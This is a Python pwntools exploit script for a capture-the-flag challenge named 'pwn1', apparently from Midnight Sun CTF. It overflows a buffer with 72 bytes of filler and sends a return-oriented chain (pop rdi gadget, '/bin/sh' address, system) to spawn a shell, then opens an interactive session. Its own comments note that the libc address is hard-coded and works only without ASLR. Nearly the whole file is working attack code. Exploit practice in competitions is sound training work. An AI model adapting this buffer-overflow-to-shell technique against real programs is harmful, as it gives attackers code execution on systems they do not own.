#!/usr/bin/env python
"""CTF exploit script for the 'pwn1' challenge, written against the Python 2
pwntools API (see the ``.next()`` call and ``str`` joining below).

Sends a fixed-length filler followed by a three-word ROP chain
(``pop rdi; ret`` -> address of "/bin/sh" -> ``system``) to the target.
The libc base is NOT leaked at runtime: it is derived from a hard-coded
printf address, so the chain only lines up when libc is mapped at exactly
that address (e.g. ASLR disabled, as in a local debugging run). Randomised
libc mappings break it; the overwritten return address is presumably
reached through the "buffer" the target prompts for -- TODO confirm against
the binary.
"""
import sys
from pwn import *

elf = ELF('./pwn1')
local = True
# 72 bytes of filler placed before the chain. The distance to the saved
# return address is assumed here, not computed (presumably measured
# beforehand in a debugger).
offset = "A"* 72
if local:
    p = elf.process()
    # libc = ELF('/lib64/ld-linux-x86-64.so.2')
    libc = ELF('libc.so')
else:
    # Dead branch while ``local`` is True: the remote CTF host is never used.
    host = "pwn1-01.play.midnightsunctf.se"
    port = 10001
    p = remote(host, port)
    libc = ELF('libc.so')

#Find address for printf in libc in order to get libc base address
# NOTE: everything read up to the prompt is discarded -- nothing is parsed
# from the target's output, so the printf address below is a fixed constant
# rather than a runtime leak.
p.recvuntil('buffer: ')
PRINTF_LIBC = 0x7ffff7e4ea20  # hard-coded; only valid when libc sits at this address (no ASLR)
# Rebase libc so that libc.symbols[...] and libc.search(...) yield
# addresses in the target's mapping instead of file offsets.
libc.address = PRINTF_LIBC - libc.symbols['printf']
system = libc.symbols['system'] #Find the address for system to use with /bin/sh
pop_rdi = 0x0000000000400783 # pop rdi ; ret, found with Ropper
bin_sh = libc.search('/bin/sh').next() # find address where /bin/sh is. (.next(): Python 2 iterator API)

#Create the rop chain
# Order matters: the gadget runs first, pops bin_sh into rdi, then returns
# into system with rdi as its argument.
rop_chain = [
    pop_rdi, bin_sh,
    system
]
rop_chain = ''.join([ p64(r) for r in rop_chain ])  # p64 returns str on Python 2
payload = offset + rop_chain
p.send(payload)
p.interactive()